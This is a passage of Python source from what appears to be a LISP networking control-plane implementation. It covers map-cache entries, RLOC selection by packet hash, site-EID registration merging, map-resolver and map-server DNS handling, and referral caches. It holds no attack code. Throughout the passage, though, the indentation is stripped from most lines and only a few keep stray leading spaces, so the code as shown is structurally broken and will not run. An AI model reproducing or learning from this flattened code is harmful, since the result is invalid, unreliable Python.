self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.gleaned_groups = []
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
                ttl = str(ttl / 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
        # The TTL is about to elapse. We need to refresh the entry once 90%
        # of the TTL has elapsed.
#
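        # For example, a 3600 second TTL triggers a refresh once 3240
        # seconds have elapsed.
        #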
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
        #endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
        # down and is waiting for an RLOC-probe reply that it will never get.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
        # Put the RLOC in lisp.lisp_rloc_probe_list if it doesn't exist. And
        # if we removed the RLOC from the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
        if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
        # If this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
        # Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
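#
# For example, group "224.1.1.1" tested against a group-mapping whose
# group-prefix is 224.0.0.0/4 returns mask-length 4, while testing it
# against 225.0.0.0/8 returns -1.
#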
#
# lisp_lookup_group
#
# Lookup group addresss in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
        #endfor
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
        if (sorted(old_rle.keys()) == sorted(new_rle.keys())): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
                #endfor
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
        # If this is a pull-based decent DNS suffix, create other lisp_mr()
        # entries for all A-records. Only the master entry (A-record index
        # 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
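#
# Note (illustrative, derived from insert_mr() and delete_mr() above):
# lisp_map_resolvers_list is keyed by the mr-name (default "all")
# concatenated with the printed Map-Resolver address.
#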
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
        # Check if the number of A-records has changed and this one is no
        # longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, then create other
        # lisp_ms() entries for all A-records. Only the master (A-record
        # index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
